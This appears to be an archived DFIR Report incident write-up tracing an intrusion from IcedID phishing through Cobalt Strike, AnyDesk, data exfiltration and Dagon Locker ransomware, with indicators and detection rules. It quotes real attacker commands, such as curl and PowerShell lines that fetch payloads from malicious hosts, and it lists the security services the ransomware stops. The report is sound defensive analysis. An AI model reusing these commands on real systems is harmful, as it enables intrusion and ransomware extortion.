{
	"id": "e7c2eda3-6e35-4859-9fa4-171f3badcff3",
	"created_at": "2026-04-06T00:16:26.076867Z",
	"updated_at": "2026-04-10T13:11:50.326327Z",
	"deleted_at": null,
	"sha1_hash": "efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1",
	"title": "From IcedID to Dagon Locker Ransomware in 29 Days - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12846991,
	"plain_text": "From IcedID to Dagon Locker Ransomware in 29 Days - The DFIR\r\nReport\r\nBy editor\r\nPublished: 2024-04-29 · Archived: 2026-04-05 13:07:08 UTC\r\nKey Takeaways\r\nIn August 2023, we observed an intrusion that started with a phishing campaign using PrometheusTDS to\r\ndistribute IcedID.\r\nIcedID dropped and executed a Cobalt Strike beacon, which was then used through-out the intrusion.\r\nThe threat actor leveraged a bespoke PowerShell tool known as AWScollector to facilitate a range of\r\nmalicious activities including discovery, lateral movement, data exfiltration, and ransomware deployment.\r\nGroup Policy was used to distribute Cobalt Strike beacons at login to a specific privileged user group.\r\nThe threat actor utilized a suite of tools to support their activities, deploying Rclone, Netscan, Nbtscan,\r\nAnyDesk, Seatbelt, Sharefinder, and AdFind.\r\nThis case had a TTR (time to ransomware) of 29 days.\r\nMore information about IcedID and Dagon Locker can be found in the following reports: SentinelOne, The DFIR\r\nReport, and Group-IB.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly\r\npublished post-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit,\r\nSliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term\r\ntracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nContact us today for a demo!\r\nTable of Contents:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 1 of 41\n\nCase Summary\r\nServices\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThis intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. This phishing\r\noperation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware. Victims were directed\r\nto a fraudulent website, mimicking an Azure download portal. Here, they were prompted to download a malicious\r\nJavaScript file. Upon executing this file, a multi-step attack was triggered. Initially, a batch file was generated and\r\nexecuted on the user’s system. This batch file used the curl command to download an IcedID DLL file. Finally,\r\nthis DLL file was executed, completing the malware installation process.\r\nOnce the DLL file was executed, the IcedID malware established persistence by creating a scheduled task on the\r\ninfected system. This ensured that the malware would continue to operate even after the system was restarted.\r\nFollowing this, the malware established a command and control (C2) connection with the IcedID servers. Through\r\nthis connection, it executed a series of discovery commands using standard Windows utilities to gather\r\ninformation about the infected system. About 30 hours after inactivity, the IcedID malware downloaded and\r\nexecuted a Cobalt Strike beacon.\r\nThe Cobalt Strike beacon was staged on the temporary file-sharing website, file.io, and was downloaded to the\r\ninfected host using PowerShell. Once executed, the threat actor leveraged commonly used system utilities such as\r\nnet , whoami , nltest , and ping to conduct discovery operations from the Cobalt Strike beacon. Shortly\r\nafter these initial discovery operations, we observed access to the Local Security Authority Subsystem Service\r\n(LSASS) process, indicating attempts to access credentials. There was also evidence of the GetSystem command\r\nbeing used for privilege escalation, allowing the attacker to obtain higher-level system privileges.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 2 of 41\n\nWithin just five minutes of executing the Cobalt Strike beacon, the threat actor initiated lateral movement within\r\nthe network. They transferred a Cobalt Strike beacon to a domain controller using the Server Message Block\r\n(SMB) protocol. This beacon was then executed via remote services.\r\nThe threat actor continued their discovery activities on both the initial beachhead and the domain controller,\r\nspecifically targeting file shares. To accomplish this, they utilized a combination of net commands, AdFind, and\r\nSharefinder to identify and access these network shares. After locating the desired network shares, they deployed\r\nRclone, though its usage was brief. Next, the threat actor shifted to using a custom PowerShell tool, named\r\nAWSCollector. This tool’s initial deployment involved executing a series of system discovery commands on\r\nremote hosts through its systeminfo module.\r\nApproximately an hour and a half after initiating data exfiltration with Rclone, the threat actor transitioned to their\r\ncustom AWSCollector script, to continue the data transfer to AWS S3 bucket storage. Over the ensuing hours, they\r\ncontinued discovery operations and even deployed a Speedtest tool, likely to assess the network speed and\r\ndetermine the feasibility and duration of their exfiltration efforts. As the data exfiltration progressed, they\r\nexpanded their foothold in the environment by deploying Cobalt Strike beacons to additional hosts. These were\r\ncopied to hosts using SMB and the Windows copy utility, followed by the execution of the beacon by remote\r\nWMIC commands.\r\nAs the situation progressed into the third day, the threat actor remained engaged and active, continuing their data\r\nexfiltration activities. They also deployed discovery tools such as Seatbelt and SoftPerfect Netscan to further\r\nexplore the network. On the fourth day, the focus shifted to the virtualization infrastructure. The threat actor\r\nexecuted various commands to gather information about the virtualization components, which involved the\r\nzipping and suspected exfiltration of targeted documents pertinent to virtualization. Additionally, on network\r\nshares, the threat actor located and reviewed documents containing passwords for the organization.\r\nEntering the fifth day, the threat actor continued discovery efforts using many of the same tools previously\r\nobserved. During this period, they also began dumping Windows event logs and executing various WMIC\r\ndiscovery commands to gain further insight into the environment. The activities on the sixth and seventh days\r\nmirrored those of the previous days. On the eighth day, the threat actor deployed AnyDesk on a domain controller\r\nusing a PowerShell script. This script not only installed AnyDesk but also created a new user account and added it\r\nto the local administrators group. On this day we also observed the threat actor deploy a new Cobalt Strike\r\nbeacon.\r\nUsing the AnyDesk access, the threat actor logged into the domain controller and accessed various system\r\nadministrator utilities, including Sites and Services, Administrative Center, Domains and Trusts, Users and\r\nComputers, and Group Policy. The focus of their activity seemed to be Group Policy, where they attempted to\r\ncreate a Logon script for the environment.\r\nThree days after their previous actions, the threat actor returned to modify the Group Policy settings they had\r\ninitially focused on. Following these changes, they expanded their operational scope by installing AnyDesk and\r\nCobalt Strike beacons on additional hosts. Over the next several days, the threat actor continued to return, utilizing\r\nthe graphical user interfaces (GUI) of Windows administrative tools to review and likely analyze data.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 3 of 41\n\nOn the 28th day of activity, the threat actor resumed operations by attempting to configure a domain controller to\r\nproxy RDP access across another network segment using the netsh utility. However, this configuration failed to\r\nachieve their intended result and was promptly removed. The threat actor also engaged in network reconnaissance\r\nby requesting Kerberos Service Principal Names (SPNs) using the setspn command-line tool.\r\nOn the 29th day, they started running discovery checks using net commands. About five hours later, they prepared\r\nfor their final operations by staging a Dagon Locker ransomware file on a domain controller. Utilizing their\r\ncustom AWSCollector script, the ransomware was deployed via SMB to remote hosts. The script also generated a\r\nbatch script to disable services, delete shadow copies, and execute the ransomware, leading to domain wide\r\nransomware. This entire process resulted in a Time to Ransomware (TTR) of 684 hours, over 29 days.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by r3nzsec, angelo_violetti \u0026 UC1\r\nInitial Access\r\nIn August 2023 we observed an IcedID e-mail phishing campaign, utilizing PrometheusTDS URLs directly in\r\nemail.\r\n@ffforward reported the distribution on Twitter:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 4 of 41\n\nFor a full breakdown on the TDS see this report by Group-IB.\r\nOnce the user clicked the link, they would be presented with an Azure looking page containing a captcha, and if\r\nthey pass all the filtering requirements of the TDS they would be presented with a download for a JavaScript file,\r\nDocument_Scan_468.js in this intrusion.\r\nExecution\r\nIcedID\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 5 of 41\n\nWhen the user executed the downloaded Javascript file, Document_Scan_468.js , the following happened:\r\nA bat file was created using a curl command to download the IcedID payload from moashraya[.]com .\r\nC:\\Windows\\System32\\cmd.exe\" /c echo curl https://moashraya[.]com/out/t.php --output\r\n\"%temp%\\magni.waut.a\" --ssl no-revoke --insecure --location \u003e \"%temp%\\magni.w.bat\r\nExecution of the batch script.\r\ncmd.exe /c \"%temp%\\magnu.w.bat\"\r\nAfter downloading, the file magni.waut.a is renamed to magni.w .\r\ncmd.exe /c ren \"%temp%\\magni.waut.a\" \"magni.w\"\r\nUsing rundll32.exe, it executes the function scab with the arguments \\k arabika752 from the\r\ndownloaded and renamed file  magni.w .\r\nrundll32 \"%temp%\\magni.w\", scab \\k arabika752\r\nShortly after, we see rundll32.exe accessing and injecting into svchost.exe\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 6 of 41\n\nUsing memory captured from the system and processing it with MemprocFS; we can see via the memory, YARA\r\nscanning confirmation of the IcedID injection into process 4492.\r\nThis process then started communicating out to the following C2 domains:\r\newacootili[.]com (151.236.9[.]176)\r\nultrascihictur[.]com (159.223.95[.]82)\r\nmagiraptoy[.]com (194.58.68[.]187)\r\nAnd then deleted the file %temp%\\festival-.dat . This was most likely an update to the IcedID configuration\r\nwhich gets loaded.\r\nA summary of the discovery commands, and other activity can be seen in the Discovery section.\r\nDecoding the obfuscated javascript\r\nDocument_Scan_468.js employed a simple obfuscating technique. The technique consists of splitting the\r\ncommands to be run into chunks of three, and concatenating them together. The same technique was used to\r\nobfuscate the JS functions as well.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 7 of 41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 8 of 41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 9 of 41\n\nCobalt Strike DLL HTTPS Beacon\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 10 of 41\n\nThe first Cobalt Strike beacon was downloaded, and subsequently executed, by the threat actor\r\nfrom file.io through the following PowerShell commands.\r\npowershell.exe(New-Object System.Net.WebClient).DownloadFile(\"https://file[.]io/OUXPza4b4uxZ\", \"C:\\P\r\n%WINDIR%\\system32\\rundll32.exe\" update.dll,HTVIyKUVoTzv\r\nCobalt Strike PowerShell HTTPS Beacon\r\nVia the Cobalt Strike command and control server, the threat actor generated a PowerShell script which injected a\r\nstageless beacon into memory.\r\nIn the first part of the script, there are two defined functions, func_get_proc_address and\r\nfunc_get_delegate_type , which are used to dynamically load and execute unmanaged code. Subsequently, a\r\nlong BASE64 encoded string is defined which corresponds to the Cobalt Strike shellcode.\r\nThe BASE64 string is then XOR decoded with a decimal key equal to 35 . In order to inject the decoded\r\nshellcode, the script retrieves the function pointer for the Windows APIs function GetModuleHandleA and\r\nGetProcAddress that are needed to obtain a pointer to VirtualAlloc . The call to VirtualAlloc creates a new\r\nmemory section with AllocationType MEM_COMMIT | MEM_RESERVERE (0x3000) and MemoryProtection\r\nExecuteReadWrite (0x40). This type of variables passed to VirtualAlloc are classic signs of process injection.\r\nSubsequently, the shellcode is copied into the newly created region of memory and then executed through the\r\nInvoke() function.\r\nThe BASE64 string can be easily decoded through CyberChef to get the Cobalt Strike shellcode. It is possible to\r\nrecognize the classic MZ header ( magic_mz_x86 and magic_mz_x64 ): MZARUH .\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 11 of 41\n\nBy executing the PowerShell script and monitoring the API calls performed by the process through API Monitor,\r\nit is possible to identify the calls to InternetConnectA() with the Cobalt Strike C2s specified as parameters.\r\nExisting Yara rules detect Cobalt Strike beacons by hunting for the previously mentioned header like the following\r\none, however, defenders need to be aware that those types of strings can be modified from beacons through\r\nmalleable profiles.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 12 of 41\n\nPersistence\r\nIcedID\r\nDuring the execution of the initial IcedID malware, a scheduled task was created to maintain persistence.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 13 of 41\n\nThe task was set to run when the user logged in using the ‘LogonTrigger’. While audit logging was not enabled to\r\nobserve the task creation via a 4698 event we were able to use Sysmon registry and file creation events for the\r\ntask XML to correlate the creation with the initial IcedID malware.\r\nRegistry item related to task creation:\r\nFile write for task XML:\r\nCobalt Strike\r\nThe threat actor created several scheduled tasks on different servers, to achieve persistent execution of Cobalt\r\nStrike. As you can see below, the scheduled task files were created by a svchost injected process.\r\nThis is an example of one of the scheduled tasks created that, when executed, downloads and executes a Cobalt\r\nStrike beacon from 51.89.133[.]3 .\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 14 of 41\n\nFurthermore, on a domain controller, the threat actor created a bat file under the local group policy directory.\r\nC:\\Windows\\System32\\GroupPolicy\\User\\Scripts\\Logon\\test.bat\r\nThe bat file contains the same PowerShell command as the scheduled task. These were then setup to execute at\r\nlogin by GPO policy targeting users in a specific domain group.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 15 of 41\n\nThese same scheduled tasks could be located in the GPO policies under SYSVOL on the domain controller, below\r\nis an example of one pulled from a memory capture.\r\nAnydesk\r\nDuring the intrusion, the threat actor used a PowerShell script named anydesk.ps1 to:\r\nDownload AnyDesk into the ProgramData folder.\r\nInstall AnyDesk in silent mode and set the password to access the software remotely.\r\nCreate a user named oldadministrator , add it to the local administrator group, and hide it from the\r\nWindows home/login screen.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 16 of 41\n\nInstalling AnyDesk in this way sets up the program with a service to start automatically, providing the threat actor\r\nwith an additional means of persistence in the network.\r\nThe AnyDesk ad.trace logs track incoming connections into the system. Those logs can be found under the folder\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\AnyDesk .\r\nThe ad_svc.trace log files record the external IP addresses that logged into the system. Those logs can be found\r\nunder the folder C:\\ProgramData\\Anydesk .\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 17 of 41\n\nAnyDesk Client-ID:\r\nClient-ID: 150937834\r\nThe following two IP addresses were identified that could be related to VPN services based on IPQualityScore:\r\n82.102.18.244 – NordVPN\r\n194.33.40.113 – Surfshark VPN\r\nNew User Creation\r\nThe anydesk.ps1 script included the creation of a new user account, which was then added to the local\r\nadministrators group and then hid from the logon screen. This latter technique is performed by setting the value of\r\nthe following registry key related to the specific user, to “0”:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\r\nPrivilege Escalation\r\nTo obtain SYSTEM privileges, the threat actor executed the getsystem Cobalt Strike functionality multiple times.\r\nWe saw the threat actor use variations of this which indicates likely getsystem activity:\r\nC:\\Windows\\system32\\cmd.exe /c echo 00e4f7418cd \u003e \\\\.\\pipe\\9090e9\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 18 of 41\n\nThis technique was thoroughly described here:\r\nSEO Poisoning to Domain Control: The Gootloader Saga Continues\r\nWhen the threat actor created the new user account, they also also added that new account to a privileged active\r\ndirectory group.\r\nDefense Evasion\r\nProcess Injection\r\nAs mentioned in the Execution section, we see IcedID injecting itself into svchost.exe\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 19 of 41\n\nWe also observed Cobalt Strike injecting into gpupdate.exe. Later they injected themselves into svchost.exe. This\r\nwas done as a result of using named pipe impersonation to get SYSTEM rights on the client.\r\nDumping PID 4860 from memory and scanning with YARA rules from the LOKI signature base we can find\r\nevidence of the Cobalt Strike injection.\r\nVolatility dump command:\r\nvol -f [REDACTED].dmp windows.memmap.Memmap --dump --pid 4860\r\nScan results:\r\nWe can get further corroboration with 1768.py:\r\nWe can also use the memory file processed with MemprocFS for similar YARA scan hits:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 20 of 41\n\nDisable or Modify System Firewall\r\nWe observed the threat actor attempting to access a restricted host by pivoting through another host.\r\nThis was attempted by using the built-in netsh portproxy command to port forward 3390 on the local host, to 3389\r\n(RDP) on the remote host.\r\nStops known services on the host\r\nGenerates a list of services to stop based on a built-in list and checking each system using Get-Service\r\nServices of interest:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 21 of 41\n\neventlog\r\nwecsvc\r\nSntpService\r\nSophos Agent\r\nSophos Endpoint Defense Service\r\nSophos Message Router\r\nSophos System Protection Service\r\nArcticWolfAgentMgr\r\nendpoint\r\ncybereason\r\ncylance\r\nDefWatch\r\nccEvtMgr\r\nccSetMgr\r\nSavRoam\r\nRTVscan\r\nYooBackup\r\nYooIT\r\nzhudongfangyu\r\nsophos\r\nstc_raw_agent\r\nVSNAPVSS\r\nVeeamTransportSvc\r\nVeeamDeploymentService\r\nVeeamNFSSvc\r\nveeam\r\nPDVFSService\r\nBackupExecVSSProvider\r\nBackupExecAgentAccelerator\r\nBackupExecAgentBrowser\r\nBackupExecDiveciMediaService\r\nBackupExecJobEngine\r\nBackupExecManagementService\r\nBackupExecRPCService\r\nAcrSch2Svc\r\nAcronisAgent\r\nCASAD2DWebSvc\r\nCAARCUpdateSvc\r\nSBPIMSvc\r\nOssecSvc\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 22 of 41\n\nDeletes shadow copies Sets system to boot into recovery mode on next restart\r\nMultiple methods to distribute and execute the ransomware If dll , use rundll32.exe If exe , use\r\nregsvr32.exe Using different switches depending if there is additional options, or not.\r\nThe module also supports testing using the -dryrun switch by not deploying the ransomware binary.\r\nThe threat actor also referenced multiple examples of running different ransomware variants, possibly indicating\r\noverlap between groups, reuse of tooling, or perhaps an affiliate that has used all of the referenced ransomware\r\nfamilies.\r\nEgregor\r\nREvil\r\nXing\r\nQuantum\r\njustright\r\nMount Locker\r\nPieper\r\nuhmc/ummc\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 23 of 41\n\nottawa\r\nConti\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 24 of 41\n\nPivoting on indicators\r\nIn the script there is a function to send messages to their Telegram Bot. This function is used multiple times\r\nthroughout the script to send updates during execution.\r\nThe domain resolves to 51.89.133[.]3 which has also been seen used as a Cobalt Strike C2 and to serve beacons\r\nduring other phases of the intrusion.\r\nChecking the certificate associated with the IP reveals an interesting association.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 25 of 41\n\n108.62.123[.]147 is also identified in the Command and Control section related to Cobalt Strike.\r\nImpact\r\n29 days after initial access, the threat actor started to deploy the Dagon Locker ransomware in the environment.\r\nThe threat actor distributed Dagon Locker ransomware on multiple systems across the environment through the\r\ncustom PowerShell script, AWScollector, and the locker module described earlier.\r\nThe following PowerShell command was run from a domain controller.\r\ninvokemodule -module locker -locker \u003cREDACTED\u003e.dll -lockerpath programdata\\microsoft -lockertype dll\r\nTo prevent data recovery and stop multiple services, two different files called sysfunc.cmd were dropped into the\r\nsystems.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 26 of 41\n\nSubsequently the execution of the locker PowerShell module, the ransomware, was deployed to different systems.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 27 of 41\n\nAll systems were left with the below message:\r\nDagon Locker left on the test workstation also a log file related to its execution called sysfunc.dll.log .\r\nVer 5.1 x64\r\n========== SYS INFO ==========\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 28 of 41\n\nCORE COUNT: [REDACTED]\r\nTOTAL MEM: [REDACTED]\r\nWIN VER: [REDACTED]\r\nWIN ARCH: x64\r\nUSER NAME: [REDACTED]\r\nPC NAME: [REDACTED]\r\nIN DOMAIN: YES\r\nIS ADMIN: YES\r\nIN GROUPS:\r\nMandatory [REDACTED]\\Domain Users\r\nMandatory \\Everyone\r\nMandatory BUILTIN\\Administrators\r\nMandatory BUILTIN\\Remote Desktop Users\r\nMandatory BUILTIN\\Users\r\nMandatory NT AUTHORITY\\NETWORK\r\nMandatory NT AUTHORITY\\Authenticated Users\r\nMandatory NT AUTHORITY\\This Organization\r\n[...]\r\nIntegrity Mandatory Label\\High Mandatory Level\r\nCMDLINE: rundll32.exe C:\\programdata\\microsoft\\sysfunc.dll,run /target=C:\\programdata\\microso\r\n[INFO] locker.init \u003e locker ext .dagoned\r\n================================\r\n KILL SERVICE\r\n================================\r\n================================\r\n KILL PROCESS\r\n================================\r\n========== TARGET LOCK ==========\r\n[INFO] locker.work.start.target \u003e type=drive target=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.work.thread.local \u003e path=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.queue.worker \u003e empty group=FAST\r\n[INFO] locker.queue.worker \u003e empty group=SLOW\r\n[ERROR] locker.dir \u003e enum error=3 name=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.work.thread.local \u003e enum finish path=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.thread.proxy \u003e finish path=C:\\programdata\\microsoft\\WPD\\\r\n==[ STATS ]=======================\r\nTotal crypted: 0.000 GB\r\nCrypt Avg: 0.000 MB/s\r\nFiles: 0.000 files/s\r\nTime: 1 sec\r\n==[ DIRS ]========================\r\nTotal: 0\r\nSkipped: 0\r\nError: 1\r\n==[ FILES ]=======================\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 29 of 41\n\nTotal: 0\r\nLocked: 0\r\n==[ FILES SKIPPED ]===============\r\nBlack: 0\r\nLocked: 0\r\nManual: 0\r\nProg: 0\r\nSize: 0\r\n==[ FILE ERROR ]==================\r\nOpen: 0\r\nRead: 0\r\nWrite: 0\r\nPos: 0\r\nRename: 0\r\n[OK] locker \u003e finished\r\nTimeline\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 30 of 41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 31 of 41\n\nDiamond Model\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 32 of 41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 33 of 41\n\nIndicators\r\nAtomic\r\nIcedID\r\n143.110.245[.]38:443\r\n159.89.124[.]188:443\r\n188.114.97[.]7:443\r\n151.236.9[.]176:443\r\n159.223.95[.]82:443\r\n194.58.68[.]187:443\r\n87.251.67[.]168:443\r\n151.236.9[.]166:443\r\nrpgmagglader[.]com\r\nultrascihictur[.]com\r\noopscokir[.]com\r\nrestohalto[.]site\r\newacootili[.]com\r\nmagiraptoy[.]com\r\nfraktomaam[.]com\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 34 of 41\n\npatricammote[.]com\r\nmoashraya[.]com\r\nCobalt Strike\r\n23.159.160[.]88\r\n45.15.161[.]97\r\n51.89.133[.]3\r\nwinupdate.us[.]to\r\nComputed\r\nDocument_Scan_468.js\r\n0d8a41ec847391807acbd55cbd69338b\r\n5066e67f22bc342971b8958113696e6c838f6c58\r\nf6e5dbff14ef272ce07743887a16decbee2607f512ff2a9045415c8e0c05dbb4\r\nlicense.dat\r\nbff696bb76ea1db900c694a9b57a954b\r\nca10c09416a16416e510406a323bb97b0b0703ef\r\n332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953\r\nRiadnc1.dll\r\na144aa7a0b98de3974c547e3a09f4fb2\r\n34c9702c66faadb4ce90980315b666be8ce35a13\r\n9da84133ed36960523e3c332189eca71ca42d847e2e79b78d182da8da4546830\r\nmagni.w\r\n7e9ef45d19332c22f1f3a316035dcb1b\r\n4e0222fd381d878650c9ebeb1bcbbfdfc34cabc5\r\n839cf7905dc3337bebe7f8ba127961e6cd40c52ec3a1e09084c9c1ccd202418e\r\nmagni.w.bat\r\nb3495023a3a664850e1e5e174c4b1b08\r\n38cd9f715584463b4fdecfbac421d24077e90243\r\n65edf9bc2c15ef125ff58ac597125b040c487640860d84eea93b9ef6b5bb8ca6\r\nupdate.dll\r\n628685be0f42072d2b5150d4809e63fc\r\n437fe3b6fdc837b9ee47d74eb1956def2350ed7e\r\na0191a300263167506b9b5d99575c4049a778d1a8ded71dcb8072e87f5f0bbcf\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 35 of 41\n\nDetections\r\nNetwork\r\nET MALWARE Win32/IcedID Requesting Encoded Binary M4\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 60%)\r\nET ATTACK_RESPONSE Microsoft Powershell Banner Outbound\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement\r\nET POLICY WinRM wsman Access - Possible Lateral Movement\r\nET INFO DYNAMIC_DNS HTTP Request to a *.us .to Domain\r\nET INFO Windows Powershell User-Agent Usage\r\nET POLICY Powershell Activity Over SMB - Likely Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File\r\nET HUNTING Possible Powershell .ps1 Script Use Over SMB\r\nET DNS Query for .to TLD\r\nET INFO DYNAMIC_DNS Query to a *.us .to Domain\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET POLICY WMIC WMI Request Over SMB - Likely Lateral Movement\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\nb26feb0b-8891-4e66-b2e7-ec91dc045d58 : AnyDesk Network\r\n8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access Check\r\n59e3a079-4245-4203-9d5c-f11290c5ba24 : Hiding local user accounts\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 36 of 41\n\ne7732014-c4b9-4653-92b2-aa7cfe154bf7 : Data Exfiltration via AWS CLI\r\n50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery\r\ndfbdd206-6cf2-4db9-93a6-0b7e14d5f02f : CHCP CodePage Locale Lookup\r\nDFIR Private Rules:\r\na526e0c3-d53b-4d61-82a1-76d3d1358a30 : Silent Installation of AnyDesk RMM\r\nb526e0c3-d53b-4d61-82a1-76d3d1358a31 : AnyDesk RMM Password Setup via Command Line\r\nde60a371-48c3-4e72-baae-ac56c8fb7349 : Data exfiltration to amazon AWS S3 buckets\r\nSigma Repo:\r\n530a6faa-ff3d-4022-b315-50828e77eef5 : Anydesk Remote Access Software Service Installation\r\n114e7f1c-f137-48c8-8f54-3088c24ce4b9 : Remote Access Tool - AnyDesk Silent Installation\r\nb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Execution\r\nb1377339-fda6-477a-b455-ac0923f9ec2c : Remote Access Tool - AnyDesk Piped Password Via CLI\r\ne37db05d-d1f9-49c8-b464-cee1a4b11638 : PUA - Rclone Execution\r\nc8557060-9221-4448-8794-96320e6f3e74 : Windows PowerShell User Agent\r\n903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\ncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\n0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo\r\n1eeed653-dbc8-4187-ad0c-eeebb20e6599 : Potential SPN Enumeration Via Setspn.EXE\r\nYara\r\nHunting/Analysis Rules:\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/23869/23869.yar\r\nhttps://github.com/malpedia/signator-rules/blob/main/rules/win.cobalt_strike_auto.yar\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 37 of 